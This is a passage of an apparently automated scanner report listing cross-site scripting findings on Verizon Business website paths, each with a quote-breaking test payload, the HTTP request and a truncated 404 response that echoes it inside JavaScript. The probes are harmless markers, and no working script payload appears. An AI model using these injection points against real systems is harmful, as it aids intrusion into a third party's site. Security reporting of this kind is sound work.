Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ded3"%3b76597243304 was submitted in the REST URL parameter 1. This input was echoed as 6ded3";76597243304 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about6ded3"%3b76597243304/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40782
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about6ded3";76597243304/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VA
...[SNIP]...

1.448. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38e1'%3b2f13d89ce12 was submitted in the REST URL parameter 1. This input was echoed as c38e1';2f13d89ce12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutc38e1'%3b2f13d89ce12/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:12 GMT
Content-Type: text/html
Content-Length: 40782
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutc38e1';2f13d89ce12/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.lengt
...[SNIP]...

1.449. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46557"%3b7e2cf0b425e was submitted in the REST URL parameter 2. This input was echoed as 46557";7e2cf0b425e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news46557"%3b7e2cf0b425e/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47243
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news46557";7e2cf0b425e/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABL
...[SNIP]...

1.450. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace7d'%3bbe4e952746 was submitted in the REST URL parameter 2. This input was echoed as ace7d';be4e952746 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsace7d'%3bbe4e952746/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47241
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newsace7d';be4e952746/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.451. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f734"%3b0d104c71a43 was submitted in the REST URL parameter 3. This input was echoed as 4f734";0d104c71a43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/4f734"%3b0d104c71a43 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:25 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/4f734";0d104c71a43";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.452. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1dc1'%3b4e4a7d059be was submitted in the REST URL parameter 3. This input was echoed as c1dc1';4e4a7d059be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c1dc1'%3b4e4a7d059be HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/c1dc1';4e4a7d059be'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.453. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40bb4"%3b00d2ec15f9b was submitted in the REST URL parameter 1. This input was echoed as 40bb4";00d2ec15f9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about40bb4"%3b00d2ec15f9b/news/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:46 GMT
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about40bb4";00d2ec15f9b/news/presskits/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.454. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ee0c'%3be78c00dffdb was submitted in the REST URL parameter 1. This input was echoed as 6ee0c';e78c00dffdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about6ee0c'%3be78c00dffdb/news/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about6ee0c';e78c00dffdb/news/presskits/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.455. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35152"%3ba0bf920797 was submitted in the REST URL parameter 2. This input was echoed as 35152";a0bf920797 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news35152"%3ba0bf920797/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:30 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47101
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news35152";a0bf920797/presskits/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.456. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36b89'%3b2db83c22046 was submitted in the REST URL parameter 2. This input was echoed as 36b89';2db83c22046 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news36b89'%3b2db83c22046/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47103
Date: Wed, 17 Nov 2010 00:51:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news36b89';2db83c22046/presskits/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.457. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b31"%3bde6ac351f01 was submitted in the REST URL parameter 3. This input was echoed as 58b31";de6ac351f01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/presskits58b31"%3bde6ac351f01/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:37 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49751
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/presskits58b31";de6ac351f01/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.458. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fcf'%3b2390c35a601 was submitted in the REST URL parameter 3. This input was echoed as a4fcf';2390c35a601 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/presskitsa4fcf'%3b2390c35a601/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49749
Date: Wed, 17 Nov 2010 00:53:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/presskitsa4fcf';2390c35a601/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.459. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc45b'%3b999e20b66d4 was submitted in the REST URL parameter 1. This input was echoed as dc45b';999e20b66d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutdc45b'%3b999e20b66d4/news/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
